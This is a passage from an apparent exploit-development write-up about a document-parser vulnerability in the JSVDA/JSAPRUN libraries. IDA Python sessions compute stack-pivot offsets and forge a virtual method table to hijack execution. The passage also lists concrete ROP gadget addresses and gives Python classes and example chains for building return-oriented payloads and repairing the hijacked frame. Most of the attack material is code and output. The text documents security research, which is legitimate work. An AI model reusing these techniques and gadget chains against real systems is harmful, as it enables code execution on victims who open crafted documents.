[16] +0x3a6fae : 0x3be26fae..0x3be27048 : (1) FvT+ : __thiscall struc_3a9de4::readBoxHeader?_3a6fae                  : lvars:0024 args:2 refs:2   exits:1
[17] +0x3a7664 : 0x3be27664..0x3be276be : (1) FvT+ :    __cdecl object_OSEG::read_ushort_3a7664                      : lvars:001c args:2 refs:90  exits:1
[18] +0x3a96ed : 0x3be296ed..0x3be2972f : (1) F-D+ : __thiscall struc_3a9de4::get_flagField_3a96ed                   : lvars:0008 args:2 refs:2   exits:1
[19] +0x4d951d : 0x3bf5951d..0x3bf5958a : (1) FvD* :    __cdecl object_9c2044::readStyleType(1000)_4d951d            : lvars:18d4 args:4 refs:1   exits:1
[20] +0x6bf3a6 : 0x3c13f3a6..0x3c13f3e7 : (1) FvD+ : __thiscall object_9c2d50::create_field(64)_6bf3a6               : lvars:0020 args:1 refs:7   exits:1
[21] +0x779662 : 0x3c1f9662..0x3c1f96c0 : (1) F-t+ : __thiscall sub_3C1F9662                                         : lvars:0004 args:2 refs:3   exits:1
[22] +0x779828 : 0x3c1f9828..0x3c1f98ad : (1) FvD* : __thiscall object_9e82a0::deserialize_field_779828              : lvars:0028 args:2 refs:1   exits:1
[23] +0x77a7bf : 0x3c1fa7bf..0x3c1fa892 : (1) FvD* : __thiscall object_e7480::readStyleType(1002)_77a7bf             : lvars:0028 args:6 refs:1   exits:1
[24] +0x7b15a6 : 0x3c2315a6..0x3c23161a : (1) FvD+ : __thiscall object_10cbd2::get_field(38)_7b15a6                  : lvars:001c args:2 refs:36  exits:1
[25] +0x7b9e07 : 0x3c239e07..0x3c239e7c : (1) FvD+ : __thiscall object_10cbd2::get_field(34)_7b9e07                  : lvars:001c args:2 refs:98  exits:1
[26] +0x861925 : 0x3c2e1925..0x3c2e1993 : (1) FvD+ : __thiscall object_9e82a0::method_createfield_861925             : lvars:0040 args:1 refs:2   exits:1

# It looks like item #19, object_9c2044::readStyleType(1000)_4d951d, has more space allocated for its "lvars" than any of the others.

At this point, we can adjust the proof-of-concept for the vulnerability to include the 0x1000 record type. Then we can set a breakpoint on the method to prove that it is being executed during runtime. After setting the breakpoint, however, the method does not get executed. Instead, another function, object_9e5ffc::readStyleType(1000)_1b6bf7, is called to read record type 0x1000. After reversing the contents of this method, we are fortunate in that it uses a different methodology to allocate 0x1020 bytes on the stack. This likely would have been found if we had expanded our query as in the following listing.

# Define a few temporary functions.
def guess_prolog(f, minimum):
    '''Use the stackpoints to guess the prolog by searching for a minimum. Right way would be to check "$ ignore micro"...'''
    fn, start = func.by(f), func.address(f)
    iterable = (ea for ea, delta in func.chunks.stackpoints(f) if abs(idaapi.get_sp_delta(fn, ea)) > minimum)
    return start, next(iterable, start)

# No register calls
filter_out_register = lambda opref: not isinstance(ins.op(opref), register_t)

# Use itertools.chain to flatten results through db.functions
flatten_calls = lambda fs: set(itertools.chain(fs, db.functions(ea=filter(func.has, map(ins.op_ref, itertools.chain(*map(func.calls, fs)))))))

# Start at style record parser, flatten the first layer of calls.
Python> f = db.a('struc_3a9de4::parseStylesContent_3a7048')
Python> db.functions.list(ea=flatten_calls(flatten_calls(func.calls(f))))
[0]   +0x00140c : 0x3ba8140c..0x3ba81412 : (1) J-D* : __thiscall JSFC_2094                                            : lvars:0000 args:8 refs:2256  exits:0
[1]   +0x089368 : 0x3bb09368..0x3bb0936e : (1) J-D* :  __stdcall JSFC_5190                                            : lvars:0000 args:2 refs:25    exits:0
[2]   +0x090e42 : 0x3bb10e42..0x3bb10e48 : (1) J-D* : __thiscall JSFC_5438                                            : lvars:0000 args:3 refs:32    exits:0
[3]   +0x0915ea : 0x3bb115ea..0x3bb115f0 : (1) J-D* : __thiscall JSFC_3583                                            : lvars:0000 args:2 refs:620   exits:0
...
[120] +0x8ea58a : 0x3c36a58a..0x3c36a5c1 : (1) LvD+ : __usercall __EH_prolog3_catch                                   : lvars:0000 args:1 refs:1613  exits:1
[121] +0x8ea600 : 0x3c36a600..0x3c36a62d : (1) LvD+ : __usercall __alloca_probe                                       : lvars:0000 args:2 refs:1082  exits:1
[122] +0x8ea914 : 0x3c36a914..0x3c36a920 : (1) LvD+ :  __unknown ___report_rangecheckfailure                          : lvars:0000 args:0 refs:104   exits:2

# Filter those 123 functions looking for one with a large frame size.
Python> db.functions.list(ea=flatten_calls(func.calls(f)), frame=True, predicate=lambda f: func.frame(f).size > 0x1000)
[0] +0x4d951d : 0x3bf5951d..0x3bf5958a : (1) FvD* : __cdecl object_9c2044::readStyleType(1000)_4d951d : lvars:18d4 args:4 refs:1 exits:1

# Search another layer deeper.
Python> db.functions.list(ea=flatten_calls(flatten_calls(func.calls(f))), frame=True, predicate=lambda f: func.frame(f).size > 0x1000)
[0] +0x1b6d66 : 0x3bc36d66..0x3bc36e26 : (1) F?D+ :    __cdecl object_OSEG::method_readHugeBuffer(1000)_1b6d66 : lvars:1020 args:7 refs:2 exits:1
[1] +0x4d951d : 0x3bf5951d..0x3bf5958a : (1) FvD* :    __cdecl object_9c2044::readStyleType(1000)_4d951d       : lvars:18d4 args:4 refs:1 exits:1
[2] +0x77ad4b : 0x3c1fad4b..0x3c1fae93 : (1) FvD+ : __thiscall sub_3C1FAD4B                                    : lvars:1074 args:1 refs:1 exits:1

# 3 results. Record type 0x1000 looks like it's worth considering (and hence was named as such).

We can confirm this method satisfies our requirements during runtime by setting a breakpoint on this method and verifying that the object_9e5ffc::readStyleType(1000)_1b6bf7 method loads 0x1000 bytes of data from the stream onto the stack.

Now that we’ve found a candidate with the ability to read a large amount of data from the stream into its frame, we’ll need to know how much to adjust the stack pointer to reach it. To determine this value, we'll need to calculate the distance between the offset of the 0x1000-sized buffer, and the value of the stack pointer at the time that we intend to control execution. The backtrace of both these points intersect in the method at 0x3C1FAF0F, object_9c2044::method_processStreams_77af0f. Thus, we will only need the distance from the frame belonging to that function.

# Backtraces for the function where we hijack execution and where we can allocate a huge stack buffer.
Python> hijack_backtrace =                       [0x3bbb2de4, 0x3be276be, 0x3be26cb2, 0x3c1faf0f, 0x3c1fb3ed, 0x3c1fb4ab, 0x3be27954]
Python> huge_backtrace = [0x3bc36d66, 0x3bc36bf7, 0x3be27048, 0x3be276be, 0x3be26cb2, 0x3c1faf0f, 0x3c1fb3ed, 0x3c1fb4ab, 0x3be27954]

Python> diffindex = next(index for index, (L1,L2) in enumerate(zip(hijack_backtrace[::-1], huge_backtrace[::-1])) if L1 != L2)
Python> assert(hijack_backtrace[-diffindex] == huge_backtrace[-diffindex])

# Use the index as the common function call, and grab all the frames that are distinct.
Python> commonframe = func.frame(hijack_backtrace[-diffindex])
Python> hijack, huge = (listmap(func.frame, items) for items in [hijack_backtrace[:-diffindex], huge_backtrace[:-diffindex]])

# Display the functions belonging to the callstacks where we want to hijack execution,
# and the function to use for allocating a large amount of data from the document.
Python> pp(listmap(fcompose(func.by, func.name), hijack + [commonframe])[::-1])
['object_9c2044::method_processStreams_77af0f',
 'object_9c2044::parseStream(DocumentEditStyles)_3a6cb2',
 'object_9c2044::parseStream(DocumentViewStyles,DocumentEditStyles)_3a76be',
 'object_OFRM::openStreamByName?_132de4']

Python> pp(listmap(fcompose(func.by, func.name), huge + [commonframe])[::-1])
['object_9c2044::method_processStreams_77af0f',
 'object_9c2044::parseStream(DocumentEditStyles)_3a6cb2',
 'object_9c2044::parseStream(DocumentViewStyles,DocumentEditStyles)_3a76be',
 'struc_3a9de4::parseStylesContent_3a7048',
 'object_9e5ffc::readStyleType(1000)_1b6bf7',
 'object_OSEG::method_readHugeBuffer(1000)_1b6d66']

# Display the frame belonging to the function triggering the vulnerability. We will be hijacking the return
# pointer inside this frame at -0xA8 from the frame for `object_9c2044::method_processStreams_77af0f`.
Python> struc.right(commonframe, [frame.members for frame in hijack])[0]
<class 'structure' name='$ F3BBB2DE4' offset=-0xb4 size=0x20>
[0] -b4+0x2               __int16 'anonymous_0'     (<class 'int'>, 2)
    -b2+0x2                                         [None, 2]
[1] -b0+0x4                   int 'var_4'           (<class 'int'>, 4)
[2] -ac+0x4               char[4] ' s'              [(<class 'int'>, 1), 4]
[3] -a8+0x4               char[4] ' r'              [(<class 'int'>, 1), 4]
[4] -a4+0x4   JSVDA::object_OFRM* 'ap_oframe_0'     (<class 'type'>, 4)
[5] -a0+0x4                 char* 'ap_streamName_4' (<class 'type'>, 4)
[6] -9c+0x4                   int 'av_flags_8'      (<class 'int'>, 4)
[7] -98+0x4  JSVDA::object_OSEG** 'ap_result_c'     (<class 'type'>, 4)

# Display the frame belonging to the function that we can use for loading a large
# amount of data from the document. Our data is loaded at -0x114C from the common frame.
Python> struc.right(commonframe, [frame.members for frame in huge])[0]
<class 'structure' name='$ F3BC36D66' offset=-0x1168 size=0x1044>
     -1168+0xc                                                 [None, 12]
[0]  -115c+0x4                     int 'var_1014'              (<class 'int'>, 4)
[1]  -1158+0x4                     int 'var_1010'              (<class 'int'>, 4)
[2]  -1154+0x4                     int 'var_100C'              (<class 'int'>, 4)
[3]  -1150+0x4              box_header 'lv_boxHeader_1008'     <class 'structure' name='box_header' offset=-0x1150 size=0x4>
[4]  -114c+0x1000           char[4096] 'lv_buffer(1000)_1004'  [(<class 'int'>, 1), 4096]
[5]   -14c+0x4                     int 'lv_canary_4'           (<class 'int'>, 4)
[6]   -148+0x4                 char[4] ' s'                    [(<class 'int'>, 1), 4]
[7]   -144+0x4                 char[4] ' r'                    [(<class 'int'>, 1), 4]
[8]   -140+0x4     JSVDA::object_OSEG* 'ap_oseg_0'             (<class 'type'>, 4)
[9]   -13c+0x4                     int 'av_size_4'             (<class 'int'>, 4)
[10]  -138+0x4                    int* 'ap_resultSize_8'       (<class 'type'>, 4)
[11]  -134+0x4    object_9e5ffc::data* 'ap_unused_c'           (<class 'type'>, 4)
[12]  -130+0x4       JSFC::CPtrArray** 'ap_ptrArray_10'        (<class 'type'>, 4)
[13]  -12c+0x4       JSFC::CPtrArray** 'ap_ptrArray_14'        (<class 'type'>, 4)
[14]  -128+0x4                     int 'avw_usedFromHeader_18' (<class 'int'>, 4)

# List the members needed to calculate the number of bytes we need to pivot the
# stack pointer into a buffer that contains more data read from the file.
Python> struc.right(commonframe, [frame.members for frame in hijack])[0].list(' *')
[2] -ac:+0x4 char[4] ' s' [(<class 'int'>, 1), 4]
[3] -a8:+0x4 char[4] ' r' [(<class 'int'>, 1), 4]

Python> struc.right(commonframe, [frame.members for frame in huge])[0].list(index=range(8), predicate=lambda m: m.size >= 0x100)
[4] -114c:+0x1000 char[4096] 'lv_buffer(1000)_1004' [(<class 'int'>, 1), 4096]

# Take the difference between the buffer with our stream data, and the stack
# pointer at the point where we can execute an address of our choosing.
Python> stack_offset_at_time_of_call = -0xA8 - 6 * 4 - 4
Python> -0x114c - stack_offset_at_time_of_call
-0x1088

By laying out each of the frames contiguously, we can see that the distance from the stack pointer at the point of hijack to the frame belonging to 0x3BE276BE is +0xA8 bytes. However, we will need to adjust it by six parameters and include the saved return address as was described previously. This results in a total of 0xC4 bytes for the first distance. Next, we take the distance from the frame containing our huge buffer to the frame owned by 0x3BE276BE. This results in a total distance of +0x114C bytes. The difference of both of these distances results in +0x1088 bytes. This is the value that we will adjust our stack pointer with so that we can pivot execution directly into the huge buffer that contains our desired stack layout.

Hijacking execution and using pivot

Due to our prior work on promoting the vulnerability, we’ve developed it into the capability of writing an arbitrary amount of data anywhere within the address space. We also did the work to determine how to control a frame pointer which enables us to take control of the %ecx register in the method that owns said frame. This register contains the this pointer which refers to an object and is used when the implementation needs to access a property from the object or a necessary virtual method. After controlling the frame pointer, we can now forge this object and substitute an address of our choosing to be dereferenced as the virtual method table.

.text:3BBB2E1D     loc_3BBB2E1D:                           ; CODE XREF: object_OFRM::openStreamByName?_132de4+17↑j
.text:3BBB2E1D 00C                 push    [ebp+ap_result_c]
.text:3BBB2E20 010                 mov     ecx, [ebp+ap_oframe_0]
.text:3BBB2E23 010                 push    0
.text:3BBB2E25 014                 push    [ebp+av_flags_8]
.text:3BBB2E28 018                 mov     edx, [ecx+JSVDA::object_OFRM.p_vftable_0] ; [note.exp] we control this with our frame pointer
.text:3BBB2E2A 018                 push    0
.text:3BBB2E2C 01C                 push    eax
.text:3BBB2E2D 020                 push    ecx
.text:3BBB2E2E 024                 call    dword ptr [edx+10h] ; [note.exp] our forged vftable contains our target at +0x10
.text:3BBB2E31 00C                 lea     esp, [ebp-8]
.text:3BBB2E34 00C                 pop     esi
.text:3BBB2E35 008                 mov     ecx, [ebp+var_4]
.text:3BBB2E38 008                 xor     ecx, ebp        ; StackCookie
.text:3BBB2E3A 008                 call    __security_check_cookie(x)
.text:3BBB2E3F 008                 leave
.text:3BBB2E40 000                 retn

In the listing, we’ll need to specify the address to execute at offset +0x10 of our forged virtual method table. This will result in the listed instructions dereferencing the virtual method of our controlled object and allow us to hijack execution. In the previous section, we calculated the distance between the stack pointer and a place that we can use to load a page-worth of data from the stream into a buffer on the stack. The only major thing that is left to do is to locate a stack pivot that we can use with the size from the previous section to adjust the stack pointer into our page-worth of stream data. Once we’ve pivoted, we can continuously execute the necessary instructions to load our payload into the address-space.

By enumerating the non-relocatable modules within the address-space of the application, we can identify many instances of the following instruction sequences. Each of these sequences allows us to adjust the stack pointer using the value loaded at -0x18 relative to the %ecx register. As we completely control the %ecx register due to our frame overwrite, we can store the distance that we had previously calculated at -0x18 from our %ecx register to pivot to our forged call stack. Our completed process can then be summarized by creating a fake virtual method table, assigning the address of one of the listed sequences to offset +0x10 of it, and then storing our distance at -0x18 of it. When the virtual method is then called, we will have begun the very first stage of actually hijacking the application’s instruction pointer.

JSAPRUN.DLL     0x610202e0: add esp, dword ptr [ecx - 0x18]; ret; 
JSAPRUN.DLL     0x61048954: add esp, dword ptr [ecx - 0x18]; dec edi; ret; 
JSAPRUN.DLL     0x610a0265: add esp, dword ptr [ecx - 0x18]; dec edx; clc; call dword ptr [ecx + 0x56]; 
JSAPRUN.DLL     0x610a13c6: add esp, dword ptr [ecx - 0x18]; fnstsw word ptr [eax]; clc; call dword ptr [ecx + 0x56]; 
JSAPRUN.DLL     0x6108d2c6: add esp, dword ptr [ecx - 0x18]; fnstsw word ptr [ecx - 7]; call dword ptr [ecx - 0x7d]; 
JSAPRUN.DLL     0x61037b04: add esp, dword ptr [ecx - 0x18]; lahf; sar esi, 1; call dword ptr [ecx + 0x68];
JSAPRUN.DLL     0x61029acd: add esp, dword ptr [ecx - 0x18]; salc; mov cl, 0xff; call dword ptr [ecx + 0x56]

Generalizations on Instruction Sequence Reuse

When putting together the chunks that are necessary for loading arbitrary code, each sequence contains a side effect that contributes to the necessity of said chunk, and an attribute that determines the method by which one can continue execution from it. For the second attribute, an instruction sequence can continue its execution in only a few ways.

The first method is generally recognized as return-oriented programming and requires control of memory that resides within a stack frame. The second method involves the combination of branch instruction and an immediate register which requires arithmetic and control of the register to continue execution. The third method involves a dereference and a branch instruction. This method requires control of an address that is relative to a register, or a branch that references a global within the address-space of the target and control of said memory location. There is a fourth method that involves runtime or operating-system-provided facilities, however, this method has not been explored within the provided exploit.

The two types of branches that are necessary to leverage each of these methods are a preserved branch which preserves some aspect of the current execution scope, or a direct branch which either discards or does not have any effect on the current scope. Generally, the primary characteristic that distinguishes whether a desired sequence can be continued from the chunk that was previously executed relies on how it may affect the stack pointer upon its entry and its exit. This is a result of the stack pointer, in essence, having similar characteristics as the instruction pointer with regard to instructions that affect it.

Based on these assumptions, the table containing the offsets of the sequences containing the necessary side effects leveraged during the exploitation process keeps track of two pieces of data. The first is the stack delta for the entirety of each chunk (excluding the stack delta if the sequence directly influences the stack pointer). The second piece of data involves any adjustments that may be applied to the stack pointer after the code chunk has continued execution to its following sequence.

From these two pieces of data, the following Python code can be used to isolate the process of chaining sequences together from the process of putting together the necessary side-effects for leveraging code execution. By implementing this abstraction, this has the effect of simplifying the stack layout process enabling an implementer to put together code sequences in a way that is better oriented toward reusability.

class StackReceiver(object):
    def __init__(self, receiver):
        self._receiver = receiver
        self._state = coro = self.__sender(receiver)
        next(coro)

    def sender(self, receive_word):
        release = None
        while True:
            while not release:
                offset = (yield)
                receive_word(offset)
                adjust = (yield)
                if adjust and isinstance(adjust, (tuple, list)):
                    [receive_word(integer) for integer in adjust]
                elif adjust:
                    receive_word(dyn.block(adjust)))
                release = (yield)

            offset = (yield)
            receive_word(offset)
            if isinstance(release, (tuple, list)):
                [receive_word(integer) for integer in release]
            else:
                receive_word(dyn.block(release))

            adjust = (yield)
            if adjust and isinstance(adjust, (tuple, list)): 
                [receive_word(integer) for integer in adjust]
            elif adjust:
                receive_word(dyn.block(adjust)))
                
            release = (yield)
        return

    def send(self, snippet, *integers):
        '''Simulate a return.'''
        state = self._state
        offset, adjust, release = snippet
        state.send(offset)
        state.send(integers if integers else adjust)
        state.send(release)

    def call(self, offset, *parameters):
        '''Simulate a call.'''
        state = self._state
        offset, adjust, release = offset if isinstance(offset, (tuple, list)) else (offset, 0, 0)
        state.send(offset)
        state.send(None)
        state.send(parameters)

    def skip(self, count):
        '''Clean up any extra parameters assumed by the current calling convention.'''
        state = self._state
        if count:
            state.send(0)
            state.send([0] * (count - 1)) if count > 1 else state.send(None)
            state.send(None)
        return

### Example usage
layout = []
stack = StackReceiver(layout.append)

# assign %eax with the delta from our original frame to &lp_oframe_230 or &ap_oframe_0.
# this way we can dereference it to get access to the contents of the object_OFRM.
delta_oframe = scope_pivot['F3C1FAF0F']['ap_oframe_0'].getoffset() - scope_pivot['F3BBB2DE4'][' s'].getoffset()
delta_oframe = scope_pivot['F3C1FAF0F']['lp_oframe_230'].getoffset() - scope_pivot['F3BBB2DE4'][' s'].getoffset()

stack.send(JSAPRUN.assign_pop_eax, delta_oframe)
stack.send(JSAPRUN.arithmetic_add_ebp_eax)

# now we can dereference %eax to point at the object_OFRM representing our document.
stack.send(JSAPRUN.assign_pop_esi, 0)
stack.send(JSAPRUN.arithmetic_addload_eax_esi)
stack.send(JSAPRUN.assign_esi_eax, 0)

# adjust %eax by +4 so that we can load the value from object_OFRM.v_index_4 into %esi.
# the integer at this index is a handle and is all we need to create a fake object_OFRM.
stack.send(JSAPRUN.arithmetic_add_imm4_eax)
stack.send(JSAPRUN.assign_pop_esi, 0)
stack.send(JSAPRUN.arithmetic_addload_eax_esi)

...

# stash %ecx containing our context into %ebx for the purpose of preserving our context.
# this way we can restore it later from %ebx to regain access to our current state.
stack.send(JSAPRUN.assign_ecx_eax)
stack.send(JSAPRUN.exchange_eax_ebx)

# void *__thiscall JSAPRUN.dll!method_mallocPageAndSurplus_7ebee(_DWORD *this, size_t av_size_0)
# this function allocates a page (0x1000) and writes it to 0x24(%ecx). if av_0 > 0x1000, then it
# also returns a pointer to that number of bytes and does nothing else.
stack.call(JSAPRUN.procedure_method_mallocPageAndSurplus_7ebee, 0x1001, 0x11111111)
stack.send(JSAPRUN.arithmetic_add_imm4_esp)

...

# open up a stream by its name, layout.frame.stream_name. %ecx contains our fake object_OFRM.
new_context = layout['context']['object(OSEG)']
assert(not(divmod(new_context.int() - layout['context'].getoffset(), 4)[1])), "Result {:s} is unaligned from {:s} and will not be accessible".format(layout['context']['object(OSEG)'].instance(), layout['context'].instance())
stack.send(JSAPRUN.assign_pop_eax, layout['object_OFRM.vftable'].getoffset())
# int __stdcall object_OFRM::method_openStream_2b5c5(JSVDA::object_OFRM *ap_this_0, wchar_t *ap_streamName_4, int a_unused_8, char avb_flags_c, int a_unused_10, JSVDA::object_OSEG **ap_result_14)
stack.send(JSAPRUN.callsib1_N_eax_c__ecx, layout['frame']['stream_name'].getoffset(), 0x22222222, 3, 0x33333333, new_context.getoffset())

# copy the %ebx containing our context back into %ecx.
stack.send(JSAPRUN.assign_pop_ecx, 0)
stack.send(JSAPRUN.exchange_eax_ebx)
stack.send(JSAPRUN.arithmetic_add_eax_ecx)
stack.send(JSAPRUN.exchange_eax_ebx)

A few more abstractions around this concept were developed to allow further flexibility such as marking a specific slot on the stack relative to another code chunk, and then using the side effect of a prior sequence to load from or store a value to that slot. By combining the second or third execution-retaining methods with a preserving-branch instruction, primitive looping constructs are possible without the need for conditional branches through the simulation of a jump table. This is useful for the situation where the amount of data being processed by each sequence is of a non-static length and dependent on a value only available during runtime.

class ReceiverMarker(StackReceiver):
    '''Experimental class for referencing a specific slot within the stack and marking the snippet where the slot is referenced.'''
    def __init__(self):
        self._collected = collected = []
        super(ReceiverMarker, self).__init__(collected.append)
        self._marked = []

    def use(self, snippet, *integers):
        '''Mark the specified snippet where a slot should be calculated from.'''
        self.send(snippet, *integers)
        self._marked = self._collected[:]

class Stacker(StackReceiver):
    '''Experimental class for referencing a specific slot within the stack to be either read from or written to.'''
    def __init__(self, stack):
        super(Stacker, self).__init__(stack.append)
        self._stack = stack

    @contextlib.contextmanager
    def reference(self, snippet, *integers, **index):
        '''Reference a slot within the stack and use it as a parameter to the specified snippet.'''
        marker = ReceiverMarker()
        try:
            abort = None
            yield marker
        except Exception as exception:
            abort = exception
        finally:
            if abort: raise abort

        # build the stack containing the entire contents that were collected.
        tempstack = parray.type(_object_=ptype.pointer_t).a
        [ tempstack.append(item) for item in marker._collected ]

        # build the stack that was marked by the caller.
        markstack = parray.type(_object_=ptype.pointer_t).a
        [ markstack.append(item) for item in marker._marked ]

        # build the stack that is being used to adjust towards a specific index.
        adjuststack = parray.type(_object_=ptype.pointer_t)
        adjuststack = adjuststack.alloc(length=index.get('index', 0))

        # push the caller's requested instruction onto the stack using the size that was marked.
        state = self._state
        offset, adjust, release = snippet
        state.send(offset)
        items = [item for item in integers]
        state.send(items + [tempstack.size() - markstack.size() + adjuststack.size()])
        state.send(release)

        # now we can push all of the elements that the caller wanted onto the stack.
        Freceive = self._receiver
        [ Freceive(item) for item in tempstack ]

The following listing is an example of the usage of the prior-mentioned abstractions.

# load the page from layout.vprotect.dynamic_buffer into %edi which was written to 0x24(%ecx) earlier.
stack.send(JSAPRUN.assign_pop_eax, divmod(layout['vprotect']['dynamic_buffer'].getoffset() - layout['context'].getoffset(), 4)[0])
stack.send(JSAPRUN.load_slotX_eax_eax)
stack.send(JSAPRUN.exchange_eax_edi)
stack.send(JSAPRUN.return_0)

# now we write %edi directly into slot 1 of whatever follows us.
with stack.reference(JSAPRUN.assign_pop_eax, index=1) as store:
    store.use(JSAPRUN.store_edi_sib1_eax_esp_0)     # mark the index from this stack position
    store.send(JSAPRUN.assign_pop_eax, layout['object_OSEG.vftable'].getoffset() - layout['context'].getoffset())
    store.send(JSAPRUN.arithmetic_add_eax_ecx)

    # adjust %ecx to move from layout.context to layout.object_OSEG.vftable so
    # that we can eventually call 8(%ecx) later to read from the opened stream.
    delta_object_oseg = layout['context']['object(OSEG)'].getoffset() - layout['object_OSEG.vftable'].getoffset()
    assert(not(delta_object_oseg % 4)), "{:s} is not aligned from {:s} and will be inaccessible.".format(layout['context']['object(OSEG)'].instance(), layout['object_OSEG.vftable'].instance())
    store.send(JSAPRUN.assign_pop_eax, divmod(delta_object_oseg, 4)[0])
    store.send(JSAPRUN.load_slotX_eax_eax)

# "store.use" overwrites index 0+1, 0xBBBBBBBB, in the following sequence.
# int __stdcall object_OSEG::method_read_2c310(JSVDA::object_OSEG *ap_object_0, BYTE *ap_buffer_8, int av_size_c, int *ap_resultSize_c)
stack.send(JSVDA.callsib1_N_ecx_8__eax__ecx, 0xBBBBBBBB, 0x1000, layout['unused_result'].getoffset())

# calling object_OSEG::method_read_2c310 cleans up all args, but prior
# sequence misses 1.. which we take care of here.
stack.skip(1)

Repairing the frame

In a previous section, we’ve combined all of the capabilities that we’ve developed and can completely control the execution of the current thread with data that was read from the stream containing our vulnerability. We’ve also successfully developed a methodology that enables us to execute multiple sequences of instructions in succession. Normally this should be enough, however, at the time that we’ve taken control of the instruction pointer, all of the streams belonging to the document have completely gone out of scope.

Another thing of concern is that we’ve used our control of the frame pointer to swap the virtual method table of the only object that is responsible for referencing the contents of our document. This results in the document being completely inaccessible to us at this point in execution, and prevents us from returning to the application when we’re done. We can avoid this, however, if we can repair the frame and re-create the objects that were in scope at the time the application was supposed to complete its parsing of the document stream.

Hence, our next step requires us to discover a way of restoring the functionality to access the contents of our document. Fortunately, we can use the frame pointer that is stored within the %ebp register to access the frame of our caller. This allows us to use it as a reference point and to access any information that was previously in the stack. Hence, when we use our ability to execute sequences of prior loaded instructions, we will need to preserve this register as it is our only gateway into the application’s original stack.

During the execution of our sequences, we can also use the %ecx about register that we took control of when modifying the frame pointer. This can be leveraged as a reference point to access or store any information to the forged object that was created with our vulnerability. It is also worth considering that the calling convention for the application preserves registers when executing a different function. As a result, the %ebx, %esi, and %edi registers can also be used to preserve any values that we need when our sequences dispatch back into the process after they fulfill our needs.

Reviewing the call-stack at the time that the virtual method from our forged object is called shows that we are 4 frames away from the function whose frame we hijacked. Hence, we will need to know the sizes of these frames if we want to access any of their contents. The diagram that follows shows each of these frames along with their sizes. In this diagram, the frame pointer within the %ebp register was preserved in the frame for object_OFRM::openStreamByName?_132de4 at 0x3BBB2DE4, and references the frame pointer farther up the call stack and preserved in the function for object_9c2044::parseStream(DocumentViewStyles,DocumentEditStyles)_3a76be at 0x3BE276BE.

# Assign the path through the backtrace that ends up dereferencing from our virtual method table.
Python> backtrace = [0x3bbb2de4, 0x3be276be, 0x3be26cb2, 0x3c1faf0f]

Python> pp(listmap(func.name, backtrace))
['object_OFRM::openStreamByName?_132de4',
 'object_9c2044::parseStream(DocumentViewStyles,DocumentEditStyles)_3a76be',
 'object_9c2044::parseStream(DocumentEditStyles)_3a6cb2',
 'object_9c2044::method_processStreams_77af0f']

# Grab the frame members for each function in the backtrace in order to study their layout.
Python> layout = struc.right(func.frame(backtrace[-1]), [func.frame(f) for f in backtrace[:-1]])

# Display each of the frames.
Python> pp(layout)
[<class 'structure' name='$ F3BBB2DE4' offset=-0x344 size=0x20>,
 <class 'structure' name='$ F3BE276BE' offset=-0x324 size=0xa8>,
 <class 'structure' name='$ F3BE26CB2' offset=-0x27c size=0x18>,
 <class 'structure' name='$ F3C1FAF0F' offset=-0x264 size=0x278>]

# List the location of each preserved frame pointer in our callstack.
Python> [(print(frame), frame.list(' *')) for frame in layout]
<class 'structure' name='$ F3BBB2DE4' offset=-0x344 size=0x20>
[2]  -33c:+0x4 char[4] ' s' [(<class 'int'>, 1), 4]
[3]  -338:+0x4 char[4] ' r' [(<class 'int'>, 1), 4]
<class 'structure' name='$ F3BE276BE' offset=-0x324 size=0xa8>
[25] -298:+0x4 char[4] ' s' [(<class 'int'>, 1), 4]
[26] -294:+0x4 char[4] ' r' [(<class 'int'>, 1), 4]
<class 'structure' name='$ F3BE26CB2' offset=-0x27c size=0x18>
[0]  -278:+0x4 char[4] ' s' [(<class 'int'>, 1), 4]
[1]  -274:+0x4 char[4] ' r' [(<class 'int'>, 1), 4]
<class 'structure' name='$ F3C1FAF0F' offset=-0x264 size=0x278>
[ 9]   -8:+0x4 char[4] ' s' [(<class 'int'>, 1), 4]
[10]   -4:+0x4 char[4] ' r' [(<class 'int'>, 1), 4]

After we stash the state of the frame pointer during execution, we then use it to immediately repair the frame pointer that was hijacked farther up the stack in the object_9c2044::method_processStreams_77af0f at 0x3C1FAF0F. Since we know what the original value for the frame pointer was intended to be, we can add the distance between the calculations of what the original frame pointer was before we overwrote it with the vulnerability.

# Owner of the frame pointer that we have access to.
Python> func.name(func.by(layout[0]))
'object_OFRM::openStreamByName?_132de4'

Python> layout[0].members.list(' *')
[2] -33c:+0x4 char[4] ' s' [(<class 'int'>, 1), 4]
[3] -338:+0x4 char[4] ' r' [(<class 'int'>, 1), 4]

# Owner of the frame pointer that we've overwritten.
Python> func.name(func.by(layout[-1]))
'object_9c2044::method_processStreams_77af0f'

Python> layout[-1].members.list(' *')
[ 9] -8:+0x4 char[4] ' s' [(<class 'int'>, 1), 4]
[10] -4:+0x4 char[4] ' r' [(<class 'int'>, 1), 4]

# Calculate the delta between both of these locations.
Python> layout[-1].members.by(' s').offset - layout[0].members.by(' s').offset
0x334

This is done by taking the difference between the " s" field in frame 0x3BBB2DE4 which is our overwritten frame pointer value, and the " s" field in frame 0x3C1FAF0F which is the correct value before overwriting the frame pointer. The result of this calculation is 0x334 bytes, and we only need to add this value to our current frame pointer in the %ebp register to determine the correct value.

We'll also need to do a similar calculation to locate the saved frame pointer that was overwritten for us to write our correct value to it. This is demonstrated in the listing that follows. Instead of using the " s" field in frame 0x3C1FAF0F, we'll need to use the " s" field in frame 0x3BE26CB2. The distance to correct the overwritten frame pointer is then calculated as +0xC4. Utilizing both values allows us to completely repair the frame and return the application to the state before our modifications after we've accomplished our goal.

# Display the layout that we'll be examining.
Python> pp(layout[:-1])
[<class 'structure' name='$ F3BBB2DE4' offset=-0x344 size=0x20>,
 <class 'structure' name='$ F3BE276BE' offset=-0x324 size=0xa8>,
 <class 'structure' name='$ F3BE26CB2' offset=-0x27c size=0x18>]

Python> pp(listmap(func.name, map(func.by, layout[:-1])))
['object_OFRM::openStreamByName?_132de4',
 'object_9c2044::parseStream(DocumentViewStyles,DocumentEditStyles)_3a76be',
 'object_9c2044::parseStream(DocumentEditStyles)_3a6cb2']

# Identify the two members that we will need to use to locate the frame pointer
# that we will need to overwrite in order to repair the call stack.
Python> pp((layout[0].members.by(' s'), layout[2].members.by(' s')))
(<member '$ F3BBB2DE4. s' index=2 offset=-0x33c size=+0x4 typeinfo='char[4]'>,
 <member '$ F3BE26CB2. s' index=0 offset=-0x278 size=+0x4 typeinfo='char[4]'>)

# Calculate the difference between the current frame pointer, and the preserved
# frame pointer that we will overwrite.
Python> layout[0].members.by(' s').offset - layout[2].members.by(' s').offset
-0xc4

Loading the contents of a stream

